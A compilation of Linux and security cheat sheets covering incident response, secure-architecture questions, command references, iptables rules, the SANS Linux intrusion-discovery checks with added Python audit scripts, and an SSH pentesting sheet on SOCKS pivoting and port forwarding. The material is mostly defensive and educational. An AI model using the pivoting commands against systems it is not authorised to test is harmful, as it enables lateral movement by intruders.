List processes: ps aux (Linux, BSD), ps -ef (Solaris), lsof +L1
Find recently-modified files (affects lots of files!): ls -lat /, find / -mtime -2d -ls

Incident Response Communications

• Do not share incident details with people outside the team responding to the incident.
• Avoid sending sensitive data over email or instant messenger without encryption.
• If you suspect the network was compromised, communicate out-of-band, e.g. non-VoIP phones.

Key Incident Response Steps

1. Preparation: Gather and learn the necessary tools, become familiar with your environment.
2. Identification: Detect the incident, determine its scope, and involve the appropriate parties.
3. Containment: Contain the incident to minimize its effect on neighboring IT resources.
4. Eradication: Eliminate compromise artifacts, if necessary, on the path to recovery.
5. Recovery: Restore the system to normal operations, possibly via reinstall or backup.
6. Wrap-up: Document the incident's details, retain collected data, and discuss lessons learned.

Other Incident Response Resources

Windows Intrusion Discovery Cheat Sheet: http://sans.org/resources/winsacheatsheet.pdf
Checking Windows for Signs of Compromise: http://www.ucl.ac.uk/cert/win_intrusion.pdf
Linux Intrusion Discovery Cheat Sheet: http://sans.org/resources/linsacheatsheet.pdf
Checking Unix/Linux for Signs of Compromise: http://www.ucl.ac.uk/cert/nix_intrusion.pdf

Authored by Lenny Zeltser, who leads a security consulting team at SAVVIS, and teaches malware analysis at SANS Institute. Special thanks for feedback to Lorna Hutcheson, Patrick Nolan, Raul Siles, Ed Skoudis, Donald Smith, Koon Yaw Tan, Gerard White, and Bojan Zdrnja. Creative Commons v3 "Attribution" License for this cheat sheet v. 1.7. More cheat sheets?


Authored by Lenny Zeltser, who leads the security consulting practice at Savvis and teaches at SANS Institute. You can find him on Twitter. Special thanks to Slava Frid for feedback. Page 2 of 2. Creative Commons v3 "Attribution" License for this cheat sheet version 1.1. See Lenny's other cheat sheets.

Application Monitoring
• What application performance monitoring requirements have been defined?
• What application security monitoring requirements have been defined?
• What application error handling and logging requirements have been defined?
• How are audit and debug logs accessed, stored, and secured?
• What application auditing requirements have been defined?

Application Design
• How many logical tiers group the application's components?
• How are user identities maintained throughout transaction calls?
• How is intermediate or in-process data stored in the application components' memory and in cache?
• What application design review practices have been defined and executed?

Access
• What user identification and authentication requirements have been defined?
• What session management requirements have been defined?
• What access requirements have been defined for URI and Service calls?
• What user authorization requirements have been defined?
• What user access restrictions have been defined?
• What user privilege levels does the application support?

#4: SECURITY PROGRAM REQUIREMENTS

Operations
• What access do system and network administrators have to the application's sensitive data?
• What security incident requirements have been defined?
• What physical controls restrict access to the application's components and data?
• What is the process for granting access to the environment hosting the application?
• What is the process for identifying and addressing vulnerabilities in network and system components?
• How do administrators access production infrastructure to manage it?

Change Management
• What mechanisms exist to detect violations of change management practices?
• How are changes to the infrastructure controlled?
• How are changes to the code controlled?
• How is code deployed to production?

Software Development
• What secure coding processes have been established?
• What staging, testing, and Quality Assurance requirements have been defined?
• How do developers assist with troubleshooting and debugging the application?
• What requirements have been defined for controlling access to the application's source code?
• What is the process for identifying and addressing vulnerabilities in the application?
• What data is available to developers for testing?

Corporate
• Which personnel oversees security processes and requirements related to the application?
• What employee initiation and termination procedures have been defined?
• What controls exist to protect a compromised in the corporate environment from affecting production?
• What security governance requirements have been defined?
• What security training do developers and administrators undergo?
• What application requirements impose the need to enforce the principle of separation of duties?
• What corporate security program requirements have been defined?

Additional Resources
• ISO 27002 Standard: Code of Practice  http://www.iso.org/iso/catalogue...
• BITS Standards for Vendor Assessments  http://www.sharedassessments.org/download...
• Payment Card Industry (PCI) Data Security Standard  https://www.pcisecuritystandards.org/security...
• IT Infrastructure Threat Modeling Guide  http://www.microsoft.com/downloads...
• Guidance for Critical Areas ... in Cloud Computing  http://www.cloudsecurityalliance.org/guidance...
• How to Write an Information Security Policy  http://www.csoonline.com/article/print/495017
• OWASP Guide to Building Secure Web Applications  http://www.owasp.org/index.php/OWASP_Guide...

77


Linux Commands (Broala cheat sheet)

Getting around

  cd logs      Move to the logs directory, which is located in the current directory.
  cd /logs     Move to the logs directory, which is located in the top-level directory.
  cd ..        Move up one directory.
  cd ~         Move to your home directory (the "tilde" character is left of the 1 key).
  cd -         Move to the directory you were previously in.

Viewing and searching in files

  cat data.txt                Display data.txt.
  cat *.txt                   Display all files that end with .txt.
  head data.txt               Display the first 10 lines of data.txt.
  head -n 20 data.txt         Display the first 20 lines of data.txt.
  tail data.txt               Display the last 10 lines of data.txt.
  tail -n 30 data.txt         Display the last 30 lines of data.txt.
  tail -F data.txt            Display the last 10 lines of data.txt and continue running, displaying any new lines in the file. Note: Press Ctrl+C to exit.
  grep malware data.txt       Display all lines in data.txt that contain 'malware'.
  grep -v malware data.txt    Display all lines that do not contain 'malware'.
  grep 'mal ware' data.txt    To search for phrases with spaces, use single quotes.
  grep -F 1.2.3.4 data.txt    To search for phrases with periods, use -F.
  grep -c exe data.txt        Display how many lines in data.txt contain 'exe' (but don't display them).
  grep -F -c 1.2.3.4 *.txt    Display the number of lines with IP 1.2.3.4 in each file that ends in .txt.
  less large.file             Display large.file in less (see "Navigating in less").
  less -S large.file          Display large.file in less (see "Navigating in less"), and allow for side-to-side scrolling.

Navigating in less

  q                   Quit.
  Up/down arrow       Move up/down one line.
  Left/right arrow    Move left/right half of a page. Note: requires less -S.
  Page up/down        Move up/down one page.
  g                   Go to the first line.
  G                   Go to the last line.
  F                   Go to the last line, and display any new lines (similar to tail -F). Note: Press Ctrl+C to exit.
  /malware            Search: go to the next line containing the word 'malware'.
  /!malware           Search: go to the next line NOT containing the word 'malware'.
  ?malware            Search: go to the previous line containing the word 'malware'.
  n                   Repeat a previous search.
  N                   Repeat a previous search, but in the opposite direction.

Tip – Tab Completion: Use tab completion to type filenames faster. As you're typing a filename (or directory), hit the tab key. If there's only one file that matches what you've typed, the rest of the filename will be filled in. If nothing happens when you hit tab, simply hit tab again to see a list of matches.

Putting it all together

  | (AKA "pipe")                                           Pass the output of one command to another command. Note: For the "pipe" character, use the key above enter (same key as backslash).
  grep malware data.txt | tail -n 30                       Display the last 30 lines in data.txt that contain the word 'malware'.
  grep malware data.txt | grep blaster                     Display lines in data.txt that contain 'malware' and also contain 'blaster'.
  cat data.txt | sort                                      Display data.txt, sorted alphabetically.
  cat data.txt | sort | uniq                               Display data.txt, sorted alphabetically, with duplicates removed.
  cat data.txt | sort | uniq -c                            Sort, remove duplicates, and display the number of times each line occurred.
  cat data.txt | sort | uniq -c | sort -n                  Sort, remove duplicates, and display the most frequent lines.
  cat data.txt | sort | uniq -c | sort -n | tail -n 20     Sort, remove duplicates, and display the 20 most frequent lines.
  cat conn.log | bro-cut id.resp_h proto service           Only display the id.resp_h, proto and service columns of the conn Bro log.
  cat http.log | bro-cut -d ts method host uri             Only display the timestamp, method, host and uri columns, and convert the timestamp to human-readable format.

Tip – Compressed Files: Files that end in .gz are compressed, and might require some different commands:

  Command          Modification for .gz
  cat or grep      Use zcat or zgrep.
  head or tail     Use zcat | head or zcat | tail.

Tip – Working With Big Files: Commands take longer to run on larger files. Some things to keep in mind are:
  • Use grep -F instead of plain grep.
  • For viewing the file, use less instead of cat.
  • Try to use grep as early as possible, so if you pipe to other tools, there's less data to crunch.

Tip – Documentation: Linux commands are all well documented. To view the documentation:
  • Run the command with --help (e.g. tail --help) to see the options.
  • Use the manual pages for more detail (e.g. man tail). Note: these open in less.

In order to promote its wide distribution, this work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/). We at Broala are committed to helping you understand Bro to the fullest so you can be a monitoring hero.

© Broala LLC.


Basic Linux Commands

SYSTEM
uname -a => Display Linux system information
uname -r => Display kernel release information
uptime => Show how long the system has been running + load
hostname => Show system host name
hostname -i => Display the IP address of the host
last reboot => Show system reboot history
date => Show the current date and time
cal => Show this month's calendar
w => Display who is online
whoami => Who you are logged in as
finger user => Display information about user

HARDWARE
dmesg => Detected hardware and boot messages
cat /proc/cpuinfo => CPU model
cat /proc/meminfo => Hardware memory
cat /proc/interrupts => Lists the number of interrupts per CPU per I/O device
lshw => Displays information on hardware configuration of the system
lsblk => Displays block device related information in Linux
free -m => Used and free memory (-m for MB)
lspci -tv => Show PCI devices
lsusb -tv => Show USB devices
dmidecode => Show hardware info from the BIOS
hdparm -i /dev/sda => Show info about disk sda
hdparm -tT /dev/sda => Do a read speed test on disk sda
badblocks -s /dev/sda => Test for unreadable blocks on disk sda

USERS
id => Show the active user id with login and group
last => Show last logins on the system
who => Show who is logged on the system
groupadd admin => Add group "admin"
useradd -c "Sam" -g admin -m sam => Create user "sam"
userdel sam => Delete user sam
adduser sam => Add user "sam"
usermod => Modify user information
chgrp => Changes a user's group

FILE COMMANDS
ls -al => Display all information about files/directories
pwd => Show the path of current directory
mkdir directory-name => Create a directory
rm file-name => Delete file
rm -r directory-name => Delete directory recursively
rm -f file-name => Forcefully remove file
rm -rf directory-name => Forcefully remove directory recursively
cp file1 file2 => Copy file1 to file2
cp -r dir1 dir2 => Copy dir1 to dir2, create dir2 if it doesn't exist
mv file1 file2 => Rename source to dest / move source to directory
ln -s /path/to/file-name link-name => Create symbolic link to file-name
touch file => Create or update file
cat > file => Place standard input into file
more file => Output contents of file
head file => Output first 10 lines of file
tail file => Output last 10 lines of file
tail -f file => Output contents of file as it grows, starting with the last 10 lines
gpg -c file => Encrypt file
gpg file.gpg => Decrypt file
wc => Print the number of bytes, words, and lines in files
xargs => Execute command lines from standard input

PROCESS RELATED
ps => Display your currently active processes
ps aux | grep 'telnet' => Find all process ids related to the telnet process
pmap => Memory map of process
top => Display all running processes
kill pid => Kill process with mentioned pid
killall proc => Kill all processes named proc
pkill process-name => Send signal to a process with its name
bg => Resumes suspended jobs without bringing them to foreground
fg => Brings the most recent job to foreground
fg n => Brings job n to the foreground

FILE PERMISSION RELATED
chmod octal file-name => Change the permissions of file to octal
Example:
chmod 777 /data/test.c => Set rwx permission for owner, group, world
chmod 755 /data/test.c => Set rwx permission for owner, rx for group and world
chown owner-user file => Change owner of the file
chown owner-user:owner-group file-name => Change owner and group owner of the file
chown owner-user:owner-group directory => Change owner and group owner of the directory

NETWORK
ip addr show => Display all network interfaces and ip address
ip address add 192.168.0.1 dev eth0 => Set ip address
ethtool eth0 => Linux tool to show ethernet status
mii-tool eth0 => Linux tool to show ethernet status
ping host => Send echo request to test connection
whois domain => Get whois information for domain
dig domain => Get DNS information for domain
dig -x host => Reverse lookup host
host google.com => Lookup DNS ip address for the name
hostname -i => Lookup local ip address
wget file => Download file
netstat -tupl => List all active listening ports

COMPRESSION / ARCHIVES
tar cf home.tar home => Create tar named home.tar containing home/
tar xf file.tar => Extract the files from file.tar
tar czf file.tar.gz files => Create a tar with gzip compression
gzip file => Compress file and rename it to file.gz

INSTALL PACKAGE
rpm -i pkgname.rpm => Install rpm based package
rpm -e pkgname => Remove package

INSTALL FROM SOURCE
./configure
make
make install

SEARCH
grep pattern files => Search for pattern in files
grep -r pattern dir => Search recursively for pattern in dir
locate file => Find all instances of file
find /home/tom -name 'index*' => Find file names that start with "index"
find /home -size +10000k => Find files larger than 10000k in /home

LOGIN (SSH AND TELNET)
ssh user@host => Connect to host as user
ssh -p port user@host => Connect to host using specific port
telnet host => Connect to the system using the telnet port

FILE TRANSFER
sftp 192.168.75.2 => Connect to remote host (sftp)
scp file.txt server2:/tmp => Secure copy file.txt to remote host /tmp folder
rsync -a /home/apps /backup/ => Synchronize source to destination

DISK USAGE
df -h => Show free space on mounted filesystems
df -i => Show free inodes on mounted filesystems
fdisk -l => Show disks partitions sizes and types
du -ah => Display disk usage in human readable form
du -sh => Display total disk usage on the current directory
findmnt => Displays target mount point for all filesystems
mount device-path mount-point => Mount a device

DIRECTORY TRAVERSE
cd .. => Go up one level of the directory tree
cd => Go to $HOME directory
cd /test => Change to /test directory


SSH Cheat Sheet

SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features. NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.

SOCKS Proxy

Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):

Command line:
ssh -D 127.0.0.1:1080 10.0.0.1

~/.ssh/config:
Host 10.0.0.1
    DynamicForward 127.0.0.1:1080

You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
tsocks rdesktop 10.0.0.2

Local Forwarding

Make services on the remote network accessible to your host via a local listener. NB: Remember that you need to be root to bind to TCP port <1024. Higher ports are used in the examples below.

Example 1
The service running on the remote host on TCP port 1521 is accessible by connecting to 10521 on the SSH client system.

Command line:
ssh -L 127.0.0.1:10521:127.0.0.1:1521 [email protected]

~/.ssh/config:
LocalForward 127.0.0.1:10521 127.0.0.1:1521

Example 2
Same thing, but other hosts on the same network as the SSH client can also connect to the remote service (can be insecure).

Command line:
ssh -L 0.0.0.0:10521:127.0.0.1:1521 10.0.0.1

~/.ssh/config:
LocalForward 0.0.0.0:10521 127.0.0.1:1521


Intrusion Discovery Cheat Sheet v2.0
Linux
POCKET REFERENCE GUIDE
SANS Institute
www.sans.org and isc.sans.org
Download the latest version of this sheet from http://www.sans.org/resources/linsacheatsheet.pdf

Purpose

System Administrators are often on the front lines of computer security. This guide aims to support System Administrators in finding indications of a system compromise.

What to use this sheet for

On a periodic basis (daily, weekly, or each time you logon to a system you manage), run through these quick steps to look for anomalous behavior that might be caused by a computer intrusion. Each of these commands runs locally on a system.

This sheet is split into these sections:
• Unusual Processes and Services
• Unusual Files
• Unusual Network Usage
• Unusual Scheduled Tasks
• Unusual Accounts
• Unusual Log Entries
• Other Unusual Items
• Additional Supporting Tools

If you spot anomalous behavior: DO NOT PANIC! Your system may or may not have come under attack. Please contact the Incident Handling Team immediately to report the activities and get further assistance.

Unusual Processes and Services

Look at all running processes:
# ps -aux
Get familiar with "normal" processes for the machine. Look for unusual processes. Focus on processes with root (UID 0) privileges.

If you spot a process that is unfamiliar, investigate in more detail using:
# lsof -p [pid]
This command shows all files and ports used by the running process.

If your machine has it installed, run chkconfig to see which services are enabled at various runlevels:
# chkconfig --list

Unusual Files

Look for unusual SUID root files:
# find / -uid 0 -perm -4000 -print
This requires knowledge of normal SUID files.

Look for unusually large files (greater than 10 MegaBytes):
# find / -size +10000k -print
This requires knowledge of normal large files.

Look for files named with dots and spaces ("...", ".. ", ". ", and " ") used to camouflage files:
# find / -name " " -print
# find / -name ".. " -print
# find / -name ". " -print
# find / -name " " -print

Unusual Files Continued

Look for processes running out of or accessing files that have been unlinked (i.e., link count is zero). An attacker may be hiding data in or running a backdoor from such files:
# lsof +L1

On a Linux machine with RPM installed (RedHat, Mandrake, etc.), run the RPM tool to verify packages:
# rpm -Va | sort
This checks size, MD5 sum, permissions, type, owner, and group of each file against information from the RPM database to look for changes. Output includes:
S – File size differs
M – Mode differs (permissions)
5 – MD5 sum differs
D – Device number mismatch
L – readLink path mismatch
U – user ownership differs
G – group ownership differs
T – modification time differs
Pay special attention to changes associated with items in /sbin, /bin, /usr/sbin, and /usr/bin. In some versions of Linux, this analysis is automated by the built-in check-packages script.

Unusual Network Usage

Look for promiscuous mode, which might indicate a sniffer:
# ip link | grep PROMISC
Note that ifconfig doesn't work reliably for detecting promiscuous mode on Linux kernel 2.4, so please use "ip link" for detecting it.

Unusual Network Usage Continued

Look for unusual port listeners:
# netstat -nap
Get more details about running processes listening on ports:
# lsof -i
These commands require knowledge of which TCP and UDP ports are normally listening on your system. Look for deviations from the norm.

Look for unusual ARP entries, mapping IP addresses to MAC addresses that aren't correct for the LAN:
# arp -a
This analysis requires detailed knowledge of which addresses are supposed to be on the LAN. On a small and/or specialized LAN (such as a DMZ), look for unexpected IP addresses.

Unusual Scheduled Tasks

Look for cron jobs scheduled by root and any other UID 0 accounts:
# crontab -u root -l
Look for unusual system-wide cron jobs:
# cat /etc/crontab
# ls /etc/cron.*

Unusual Accounts

Look in /etc/passwd for new accounts in a sorted list by UID:
# sort -nk3 -t: /etc/passwd | less
Normal accounts will be there, but look for new, unexpected accounts, especially with UID < 500. Also, look for unexpected UID 0 accounts:
# egrep ':0+:' /etc/passwd
On systems that use multiple authentication methods:
# getent passwd | egrep ':0+:'

Look for orphaned files, which could be a sign of an attacker's temporary account that has been deleted:
# find / -nouser -print

Unusual Log Entries

Look through your system log files for suspicious events, including:
• "entered promiscuous mode"
• Large number of authentication or login failures from either local or remote access tools (e.g., telnetd, sshd, etc.)
• Remote Procedure Call (rpc) programs with a log entry that includes a large number (> 20) of strange characters (such as ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM)
• For systems running web servers: larger than normal number of Apache logs saying "error"
• Reboots and/or application restarts

Other Unusual Items

Sluggish system performance:
$ uptime – Look at "load average"
Excessive memory use:
$ free
Sudden decreases in available disk space:
$ df

Additional Supporting Tools

The following tools are often not built into the Linux operating system, but can be used to analyze its security status in more detail. Each is available for free download at the listed web site.

DISCLAIMER: The SANS Institute is not responsible for creating, distributing, warranting, or supporting any of the following tools.

Chkrootkit looks for anomalies on systems introduced by user-mode and kernel-mode RootKits – www.chkrootkit.org
Tripwire looks for changes to critical system files – www.tripwire.org - free for Linux for non-commercial use
AIDE looks for changes to critical system files – http://www.cs.tut.fi/~rammer/aide.html
The Center for Internet Security has released a Linux hardening guide for free at www.cisecurity.org. The free Bastille Script provides automated security hardening for Linux systems, available at www.bastille-linux.org.
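The "Unusual Accounts" checks (a passwd listing sorted by UID, the `egrep ':0+:'` test for extra UID 0 accounts, and a look for accounts that were not there before) can be run as one scripted pass. The following is an added example and is not part of the SANS sheet: the passwd records and the known-good baseline set are constructed for illustration, and on a real host the baseline would come from a snapshot taken when the system was built and the input from `getent passwd` so that every configured name service is covered.

```python
"""Scripted version of the "Unusual Accounts" checks: sort passwd records by
UID, flag every UID 0 account other than root, and flag accounts that are
not in a known-good baseline (low-UID ones are called out separately, since
a rogue account hidden in the system range is easy to overlook).

Added example, not part of the SANS sheet. The passwd records and the
baseline below are constructed; feed a live host the output of
`getent passwd` rather than only /etc/passwd.
"""
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Account:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(lines: Iterable[str]) -> list[Account]:
    """Parse passwd(5) records: name:password:UID:GID:GECOS:home:shell."""
    accounts = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd record: {line!r}")
        name, _pw, uid, gid, gecos, home, shell = fields
        # int() also normalises padded UIDs such as "00", which `egrep ':0+:'` matches
        accounts.append(Account(name, int(uid), int(gid), gecos, home, shell))
    return accounts


def sorted_by_uid(accounts: list[Account]) -> list[Account]:
    """Same ordering as `sort -nk3 -t: /etc/passwd`."""
    return sorted(accounts, key=lambda a: (a.uid, a.name))


def uid0_accounts(accounts: list[Account]) -> list[Account]:
    """Equivalent of `egrep ':0+:'`: every account that resolves to UID 0."""
    return [a for a in accounts if a.uid == 0]


def audit_passwd(lines: Iterable[str], baseline: set[str],
                 system_uid_max: int = 500) -> list[tuple[str, int, str]]:
    """Return (name, uid, reason) findings, ordered by UID."""
    findings = []
    for acct in sorted_by_uid(parse_passwd(lines)):
        reasons = []
        if acct.uid == 0 and acct.name != "root":
            reasons.append("extra UID 0 account")
        if acct.name not in baseline:
            tag = " (system-range UID)" if acct.uid < system_uid_max else ""
            reasons.append("not in baseline" + tag)
        if reasons:
            findings.append((acct.name, acct.uid, "; ".join(reasons)))
    return findings


# Constructed sample data for illustration (not taken from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm2:x:00:0:backup admin:/root:/bin/bash
svc_updt:x:499:499::/var/tmp/.cache:/bin/sh
bob:x:1001:1001:Bob:/home/bob:/bin/bash
"""

# Known-good account names, e.g. recorded at build time.
BASELINE = {"root", "daemon", "sshd", "alice"}

if __name__ == "__main__":
    for name, uid, reason in audit_passwd(SAMPLE_PASSWD.splitlines(), BASELINE):
        print(f"{uid:>6}  {name:<10} {reason}")
```

Running the block reports sysadm2 (a second UID 0 account, written with a padded UID), svc_updt (an unknown account in the system range) and bob (an unknown account in the normal user range); root, daemon, sshd and alice are in the baseline and produce no finding.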

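The `rpm -Va` output described under "Unusual Files Continued" is long on a real host, and the sheet's advice is to concentrate on content or ownership changes in /sbin, /bin, /usr/sbin and /usr/bin. The following is an added example and is not part of the SANS sheet: it parses verify lines in the format rpm prints (a flag column, an optional one-letter attribute such as "c" for a config file, then the path) and ranks them. The sample verify lines are constructed.

```python
"""Triage `rpm -Va` output: content and ownership changes under the critical
binary directories rank highest, a missing file there likewise; a modified
config file (attribute "c") is usually a local edit and is reported for
information only; a bare mtime change is noise.

Added example, not part of the SANS sheet. The verify lines below are
constructed; on a live host pipe `rpm -Va` into triage().
"""
from dataclasses import dataclass

CRITICAL_DIRS = ("/sbin/", "/bin/", "/usr/sbin/", "/usr/bin/")
SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2, "info": 3}
FLAG_MEANING = {
    "S": "size differs", "M": "mode differs", "5": "MD5/digest differs",
    "D": "device number mismatch", "L": "readlink path mismatch",
    "U": "user ownership differs", "G": "group ownership differs",
    "T": "modification time differs", "P": "capabilities differ",
}
CONTENT_FLAGS = {"S", "5", "L", "D"}
META_FLAGS = {"M", "U", "G", "P"}


@dataclass(frozen=True)
class VerifyRecord:
    path: str
    flags: frozenset        # letters from the flag column; "." and "?" dropped
    attr: str               # "c" config, "d" documentation, ... or ""
    missing: bool


def parse_rpm_verify(lines):
    """Parse `rpm -Va` lines such as 'S.5....T.  c /etc/ssh/sshd_config'."""
    records = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line.strip():
            continue
        head, _, rest = line.partition(" ")
        rest = rest.lstrip()
        attr = ""
        # attribute marker is one letter followed by a space; paths start with "/"
        if len(rest) > 2 and rest[1] == " " and rest[0] in "cdglra":
            attr, rest = rest[0], rest[2:].lstrip()
        if not rest.startswith("/"):
            raise ValueError(f"cannot find path in verify line: {line!r}")
        if head == "missing":
            records.append(VerifyRecord(rest, frozenset(), attr, True))
            continue
        flags = frozenset(ch for ch in head if ch not in ".?")
        unknown = flags - set(FLAG_MEANING)
        if unknown:
            raise ValueError(f"unknown verify flag(s) {sorted(unknown)} in {line!r}")
        records.append(VerifyRecord(rest, flags, attr, False))
    return records


def severity(rec):
    in_critical = rec.path.startswith(CRITICAL_DIRS)
    content = bool(rec.flags & CONTENT_FLAGS)
    meta = bool(rec.flags & META_FLAGS)
    if rec.missing:
        return "high" if in_critical else "medium"
    if in_critical and (content or meta):
        return "high"
    if rec.attr == "c" and rec.flags <= {"S", "5", "T"}:
        return "info"       # locally edited config file: expected, still worth a glance
    if content or meta:
        return "medium"
    return "low"            # mtime only, e.g. touched by a backup restore


def triage(lines):
    """Return (severity, path, description) sorted high -> info, file order within a level."""
    out = []
    for rec in parse_rpm_verify(lines):
        desc = "file missing" if rec.missing else ", ".join(FLAG_MEANING[f] for f in sorted(rec.flags))
        out.append((severity(rec), rec.path, desc))
    return sorted(out, key=lambda t: SEVERITY_ORDER[t[0]])


# Constructed sample output for illustration (not from a real host).
SAMPLE_RPM_VA = """\
S.5....T.    /usr/bin/ps
.M.......    /bin/ls
S.5....T.  c /etc/ssh/sshd_config
.......T.  d /usr/share/doc/bash/README
missing      /usr/sbin/tcpd
..5....T.    /usr/lib64/libexample.so.1
"""

if __name__ == "__main__":
    for sev, path, desc in triage(SAMPLE_RPM_VA.splitlines()):
        print(f"{sev:<7} {path:<32} {desc}")
```

The ranking is deliberately conservative: anything in the four critical directories whose size, digest or ownership changed comes out on top, because that is where a replaced binary would show up, while the edited sshd_config is reported at the bottom so it does not drown out the real findings.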


Iptables Cheat Sheet

Iptables is a Linux kernel-level module allowing us to perform various networking manipulations (i.e. packet filtering) to achieve better network security.

View All Current Iptables Rules:

iptables -L -v

View All INPUT Rules:

iptables -L INPUT -nv

How To Block An IP Address Using Iptables:

iptables -I INPUT -s "201.128.33.200" -j DROP

To Block A Range Of IP Addresses:

iptables -I INPUT -s "201.128.33.0/24" -j DROP

How To Unblock An IP Address:

iptables -D INPUT -s "201.128.33.200" -j DROP

How To Block All Connections To A Port:

To block port 25:

iptables -A INPUT -p tcp --dport 25 -j DROP

iptables -A INPUT -p udp --dport 25 -j DROP

How To Un-Block:

To enable port 25:

iptables -A INPUT -p tcp --dport 25 -j ACCEPT

iptables -A INPUT -p udp --dport 25 -j ACCEPT

Note: iptables evaluates rules in order and stops at the first match, so an ACCEPT rule appended after the DROP rules above never gets a chance to match; to actually unblock the port, delete the DROP rules with iptables -D (the same way an IP address is unblocked above).

To Save All Rules So That They Are Not Lost In Case Of A Server Reboot:

/etc/init.d/iptables save

Or, alternatively:

service iptables save

Delete A Rule By Line Number

Output all the ip tables rules with line numbers:

iptables -L INPUT -n --line-numbers

You'll get the list of all rules, including the blocked IPs. Look at the number on the left, then:

iptables -D INPUT [LINE NUMBER]

Open Port 3306 (MySQL) To IP 1.2.3.4

iptables -I INPUT -i eth0 -s 1.2.3.4 -p tcp --destination-port 3306 -j ACCEPT -m comment --comment "MySQL Access By IP"

ADD RULE with PORT and IPADDRESS

sudo iptables -A INPUT -p tcp -m tcp --dport port_number -s ip_address -j ACCEPT

ADD RULE for PORT on all addresses

sudo iptables -A INPUT -p tcp -m tcp --dport port_number --sport 1024:65535 -j ACCEPT

DROP IP ADDRESS

sudo iptables -I INPUT -s x.x.x.x -j DROP

VIEW IPTABLES with rule numbers

sudo iptables -L INPUT -n --line-numbers

REMOVE A RULE

#Use above command and note rule_number

sudo iptables -D INPUT rule_number

#DEFAULT POLICY

-P INPUT DROP

-P OUTPUT DROP

-P FORWARD DROP

-A INPUT -i lo -j ACCEPT #allow lo input

-A OUTPUT -o lo -j ACCEPT #allow lo output

-A INPUT -m limit --limit 5/min -j LOG --log-prefix "iptables-INPUT denied: " --log-level 7 #log INPUT Denied

-A OUTPUT -m limit --limit 5/min -j LOG --log-prefix "iptables-OUTPUT denied: " --log-level 7 #log OUTPUT Denied

#ALLOW OUTPUT PING/MTR (or traceroute -I, traceroute by default uses UDP - force with ICMP)

-A OUTPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

-A INPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT

-A INPUT -p icmp --icmp-type 11 -m state --state ESTABLISHED,RELATED -j ACCEPT

#ALLOW INPUT PING/MTR

-A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

-A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT

#ALLOW OUTPUT

-A OUTPUT -p tcp -m multiport --dports 80,443 -m state --state NEW,ESTABLISHED -j ACCEPT

-A INPUT -p tcp -m multiport --sports 80,443 -m state --state ESTABLISHED -j ACCEPT

-A OUTPUT -p udp -m multiport --dports 53,123 -m state --state NEW,ESTABLISHED -j ACCEPT

-A INPUT -p udp -m multiport --sports 53,123 -m state --state ESTABLISHED -j ACCEPT


Searching in Files

Searching for Text in ASCII Files

If you are looking for text within a file, use the grep command.

grep pattern file - Search for pattern in file.

grep -v pattern file - Invert match. Return lines from file that do not match pattern.

$ cat secret
site: facebook.com
user: bob
pass: Abee!
$ grep user secret
user: bob
$ grep o secret
site: facebook.com
user: bob
$ grep -v o secret
pass: Abee!

Here are some more common options to use with grep.

grep -i - Perform a search, ignoring case.

grep -c - Count the number of occurrences in a file.

grep -n - Precede output with line numbers from the file.

$ grep User secret
$ grep -i User secret
user: bob
$ grep -ci User secret
1
$ grep -ni User secret
2:user: bob

Searching For Text in Binary Files

If you run grep against a binary file, it will simply display whether or not that information was found in the file, but it will not display the surrounding text. To look at textual data within a binary file use the strings command.

strings file - Display printable strings in binary files.

$ grep -i john BlueTrain.mp3
Binary file BlueTrain.mp3 matches
$ strings BlueTrain.mp3 | grep -i john
John Coltrane
John Coltrane
$

Pipes

You will notice that two commands have been chained together with a vertical bar, also known as the pipe symbol. The pipe (|) means take the standard output from the preceding command


and pass it as the standard input to the following command. If the first command displays error messages those will not be passed to the second command. Those error messages are called "standard error" output. You will learn how to manipulate standard error output in the "Redirection" chapter.

Also notice that in the first occurrence of the grep command the format of grep -i pattern file was used. In the second, the format of grep -i pattern was used. In the first format the input for grep came from file. In the second format the input for grep came from the preceding command via the pipe.

If you run strings BlueTrain.mp3 a lot of text will be displayed on the screen. Instead of letting that text pass you by, you can feed it to grep -i john using a pipe. The result, as you can see, is that 'John Coltrane' was found twice in the strings BlueTrain.mp3 output.

Pipes aren't limited to just two commands. You can keep chaining commands together until you get the desired result you are looking for. Let's feed the output from grep to head -1 to limit the output to just one line.

$ strings BlueTrain.mp3 | grep -i john | head -1
John Coltrane
$

Let's say you only want to display the second word of the above output. You can use the cut command to accomplish that goal.

cut [file] - Cut out selected portions of file. If file is omitted, use standard input.

cut -d delimiter - Use delimiter as the field separator.

cut -f N - Display the Nth field.

To extract 'Coltrane' from 'John Coltrane', use a space as the delimiter (-d ' ') and print the second field (-f 2). The space was quoted since spaces are typically ignored by the shell. Single quotes or double quotes work the same in this situation.

$ strings BlueTrain.mp3 | grep -i john | head -1 | cut -d ' ' -f 2
Coltrane
$

You will find that there are many small commands that do just one thing well. Some examples are awk, cat, cut, fmt, join, less, more, nl, pr, sed, seq, sort, tr, and uniq. Let's take an example using some of those commands and chain them together with pipes.

The /etc/passwd file contains a list of accounts on the system and information about those accounts. In this example, the goal is to find all of the users named "bob" listed in the /etc/passwd file and print them in alphabetical order by username in a tabular format. Here is one way you could do that.

$ grep bob /etc/passwd
